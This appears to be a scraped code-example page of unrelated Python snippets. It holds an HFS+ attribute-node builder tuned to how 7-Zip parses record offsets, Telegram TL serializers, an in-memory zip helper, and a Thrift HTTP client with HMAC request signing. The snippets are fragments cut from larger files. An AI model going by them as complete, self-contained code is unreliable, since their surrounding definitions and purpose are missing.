        if itemData:
            node.write(itemData)

        #offsets   
        offsets = struct.pack(">H",nodeDataOffset+kHeadSize + kRecordHeaderSize + data.keyLen + record.dataSize) #offsetNext because 7zip calculates record size based on difference between values of record offsets we need to put at least 2 offsets
        offsets += struct.pack(">H",nodeDataOffset) #offset
        node.seek(FileAttributes.NODE_SIZE - len(offsets))
        node.write(offsets)
        
        #add to rest of attributes
        node.seek(0)
        self.__content.write( node.read() )

    def getContent(self):
        #update content first
        self.__content.seek( sizeof(BTNodeDescriptor()) )
        self.__content.write( self.__hr )
        self.__content.seek(0)
        return self.__content.read()
Exemple #57
0
    def write(self) -> bytes:
        b = BytesIO()
        b.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 3) if self.can_view_participants is not None else 0
        flags |= (1 << 6) if self.can_set_username is not None else 0
        flags |= (1 << 7) if self.can_set_stickers is not None else 0
        flags |= (1 << 10) if self.hidden_prehistory is not None else 0
        flags |= (1 << 12) if self.can_view_stats is not None else 0
        flags |= (1 << 0) if self.participants_count is not None else 0
        flags |= (1 << 1) if self.admins_count is not None else 0
        flags |= (1 << 2) if self.kicked_count is not None else 0
        flags |= (1 << 2) if self.banned_count is not None else 0
        flags |= (1 << 13) if self.online_count is not None else 0
        flags |= (1 << 4) if self.migrated_from_chat_id is not None else 0
        flags |= (1 << 4) if self.migrated_from_max_id is not None else 0
        flags |= (1 << 5) if self.pinned_msg_id is not None else 0
        flags |= (1 << 8) if self.stickerset is not None else 0
        flags |= (1 << 9) if self.available_min_id is not None else 0
        b.write(Int(flags))

        b.write(Int(self.id))

        b.write(String(self.about))

        if self.participants_count is not None:
            b.write(Int(self.participants_count))

        if self.admins_count is not None:
            b.write(Int(self.admins_count))

        if self.kicked_count is not None:
            b.write(Int(self.kicked_count))

        if self.banned_count is not None:
            b.write(Int(self.banned_count))

        if self.online_count is not None:
            b.write(Int(self.online_count))

        b.write(Int(self.read_inbox_max_id))

        b.write(Int(self.read_outbox_max_id))

        b.write(Int(self.unread_count))

        b.write(self.chat_photo.write())

        b.write(self.notify_settings.write())

        b.write(self.exported_invite.write())

        b.write(Vector(self.bot_info))

        if self.migrated_from_chat_id is not None:
            b.write(Int(self.migrated_from_chat_id))

        if self.migrated_from_max_id is not None:
            b.write(Int(self.migrated_from_max_id))

        if self.pinned_msg_id is not None:
            b.write(Int(self.pinned_msg_id))

        if self.stickerset is not None:
            b.write(self.stickerset.write())

        if self.available_min_id is not None:
            b.write(Int(self.available_min_id))

        return b.getvalue()
Exemple #58
0
class Ziper(object):
    def __init__(self, raw_file_content=None):
        # Create the in-memory file-like object
        self.in_memory_zip = BytesIO()
        if raw_file_content:
            self.in_memory_zip.write(raw_file_content)

    def add(self, filename_in_zip, file_contents):
        """Appends a file with name filename_in_zip and contents of
        file_contents to the in-memory zip."""
        # Get a handle to the in-memory zip in append mode
        zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED,
                             False)
        # 压缩包存在文件覆盖掉
        if filename_in_zip in zf.namelist():
            # 建立存放文件的临时文件夹
            tmp_zip_path_name = uuid.uuid4()
            tmp_zip_path = '/tmp/%s' % tmp_zip_path_name
            os.makedirs(tmp_zip_path)
            new_zip_path = None
            try:
                # 解压到临时文件夹
                for item in zf.namelist():
                    if not item == filename_in_zip:
                        zf.extract(item, tmp_zip_path)

                # 覆盖的解压文件夹中存在的该文件
                with open(os.path.join(tmp_zip_path, filename_in_zip),
                          'w') as adding_file:
                    adding_file.write(file_contents)

                # 构造新的压缩包文件
                new_zip_path = tmp_zip_path + '.zip'
                new_zip_file = zipfile.ZipFile(new_zip_path, 'w',
                                               zipfile.ZIP_DEFLATED)
                # 压缩解压文件夹内容
                pre_len = len(tmp_zip_path)
                for dirpath, dirnames, filenames in os.walk(tmp_zip_path):
                    for filename in filenames:
                        pathfile = os.path.join(dirpath, filename)
                        arcname = pathfile[pre_len:].strip(os.path.sep)
                        new_zip_file.write(pathfile, arcname)
                new_zip_file.close()
                # 新的压缩文件读到内存中
                with open(new_zip_path, 'rb') as nzf:
                    self.in_memory_zip = BytesIO()
                    self.in_memory_zip.write(nzf.read())
            except Exception as e:
                raise e
            finally:
                # 删除临时文件夹和新的压缩文件
                shutil.rmtree(tmp_zip_path)
                if new_zip_path:
                    os.remove(new_zip_path)
        else:
            zf.writestr(filename_in_zip, file_contents)
            # Mark the files as having been created on Windows so that
            # Unix permissions are not inferred as 0000
            for zfile in zf.filelist:
                zfile.create_system = 0
        return self

    def read(self):
        """Returns a string with the contents of the in-memory zip."""
        self.in_memory_zip.seek(0)
        return self.in_memory_zip.read()

    def write_to_file(self, filename):
        """Writes the in-memory zip to a file."""
        with open(filename, "wb") as f:
            f.write(self.read())

    def read_file(self, filename):
        zf = zipfile.ZipFile(self.in_memory_zip, "r")
        return zf.open(filename)
Exemple #59
0
class THttpClient(TTransportBase):
    """Http implementation of TTransport base for EMQ."""
    def __init__(self,
                 credential,
                 uri_or_host,
                 timeout=None,
                 thrift_protocol=ThriftProtocol.TBINARY):
        self.credential = credential
        parsed = urlparse(uri_or_host)
        self.scheme = parsed.scheme
        assert self.scheme in ('http', 'https')
        if self.scheme == 'http':
            self.port = parsed.port or http.client.HTTP_PORT
        elif self.scheme == 'https':
            self.port = parsed.port or http.client.HTTPS_PORT
        self.host = parsed.hostname
        self.path = parsed.path
        if parsed.query:
            self.path += '?%s' % parsed.query
        self.__timeout = timeout
        self.__protocol = thrift_protocol
        self.__wbuf = BytesIO()
        self.__http = None
        self.__custom_headers = None
        self.__clock_offset = 0

    def open(self):
        if self.scheme == 'http':
            self.__http = http.client.HTTPConnection(self.host, self.port)
        else:
            self.__http = http.client.HTTPSConnection(self.host, self.port)

    def close(self):
        self.__http.close()
        self.__http = None

    def isOpen(self):
        return self.__http is not None

    def setTimeout(self, ms):
        if not hasattr(socket, 'getdefaulttimeout'):
            raise NotImplementedError

        if ms is None:
            self.__timeout = None
        else:
            self.__timeout = ms / 1000.0

    def setCustomHeaders(self, headers):
        self.__custom_headers = headers

    def read(self, sz):
        return self.__response.read(sz)

    def write(self, buf):
        self.__wbuf.write(buf)

    def __withTimeout(f):
        def _f(*args, **kwargs):
            orig_timeout = socket.getdefaulttimeout()
            socket.setdefaulttimeout(args[0].__timeout)
            result = f(*args, **kwargs)
            socket.setdefaulttimeout(orig_timeout)
            return result

        return _f

    def flush(self):
        if self.isOpen():
            self.close()
        self.open()

        # Pull data out of buffer
        data = self.__wbuf.getvalue()
        self.__wbuf = BytesIO()

        # HTTP request
        self.__http.putrequest('POST', self.path)

        # Write headers
        headers = self.__set_headers(data)

        default_user_agent = 'Python/THttpClient'
        if not self.__custom_headers or USER_AGENT not in self.__custom_headers:
            user_agent = default_user_agent
            script = os.path.basename(sys.argv[0])
            if script:
                user_agent = '%s (%s)' % (user_agent,
                                          urllib.parse.quote(script))
            self.__http.putheader(USER_AGENT, user_agent)

        for key, val in self.__auth_headers(
                dict(
                    list(headers.items()) +
                    list(self.__custom_headers.items()))).items():
            self.__http.putheader(key, val)

        self.__http.endheaders()

        # Write payload
        self.__http.send(data)

        # Get reply to flush the request
        self.__response = self.__http.getresponse()
        res = self.__response
        # print "http get reply is:%s" % self.__http.getreply
        code = self.__response.status
        if code != 200:
            raise Exception(res.reason + '\n' + res.read().decode('utf-8'))

    # Decorate if we know how to timeout
    if hasattr(socket, 'getdefaulttimeout'):
        flush = __withTimeout(flush)

    def __auth_headers(self, headers):
        string_to_assign = str()
        string_to_assign += '%s\n' % 'POST'
        string_to_assign += '%s\n' % headers[CONTENT_MD5]
        string_to_assign += '%s\n' % headers[CONTENT_TYPE]
        string_to_assign += '\n'
        string_to_assign += '%s' % self.__canonicalize_xiaomi_headers(headers)
        string_to_assign += '%s' % self.__canonicalize_resource(self.path)
        signature = \
            base64.b64encode(hmac.new(self.credential.secretKey.encode('utf-8'), string_to_assign.encode('utf-8'),
                                         digestmod=sha1).digest()).strip().decode("utf-8")
        auth_string = "Galaxy-V2 %s:%s" % (self.credential.secretKeyId,
                                           signature)
        headers[AUTHORIZATION] = auth_string

        return headers

    def __set_headers(self, body):
        headers = dict()
        headers[HOST] = self.host
        headers[CONTENT_LENGTH] = str(len(body))
        headers[TIMESTAMP] = str(int(time.time() + self.__clock_offset))
        headers[CONTENT_MD5] = hashlib.md5(body).hexdigest()
        headers[CONTENT_TYPE] = THRIFT_HEADER_MAP[self.__protocol]
        headers[MI_DATE] = email.utils.formatdate(time.time())
        return headers

    def __canonicalize_xiaomi_headers(self, http_headers):
        if http_headers is None or len(http_headers) == 0:
            return ''

        canonicalized_headers = dict()
        for key in http_headers:
            lower_key = key.lower()
            try:
                lower_key = lower_key.decode('utf-8')
            except:
                pass

            if http_headers[key] and lower_key.startswith(
                    XIAOMI_HEADER_PREFIX):
                if type(http_headers[key]) != str:
                    canonicalized_headers[lower_key] = str()
                    i = 0
                    for k in http_headers[key]:
                        canonicalized_headers[lower_key] += '%s' % (k.strip())
                        i += 1
                        if i < len(http_headers[key]):
                            canonicalized_headers[lower_key] += ','
                else:
                    canonicalized_headers[lower_key] = http_headers[key].strip(
                    )

        result = ""
        for key in sorted(canonicalized_headers.keys()):
            values = canonicalized_headers[key]
            result += '%s:%s\n' % (key, values)
        return result

    def __canonicalize_resource(self, uri):
        result = ""
        parsed_url = urlparse(uri)
        result += '%s' % parsed_url.path
        query_args = parsed_url.query.split('&')

        i = 0
        for query in sorted(query_args):
            key = query.split('=')
            if key[0] in SubResource.get_all_subresource():
                if i == 0:
                    result += '?'
                else:
                    result += '&'
                if len(key) == 1:
                    result += '%s' % key[0]
                else:
                    result += '%s=%s' % (key[0], key[1])
                i += 1
        return result
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        # No flags

        data.write(Vector(self.new_messages))

        data.write(Vector(self.new_encrypted_messages))

        data.write(Vector(self.other_updates))

        data.write(Vector(self.chats))

        data.write(Vector(self.users))

        data.write(self.intermediate_state.write())

        return data.getvalue()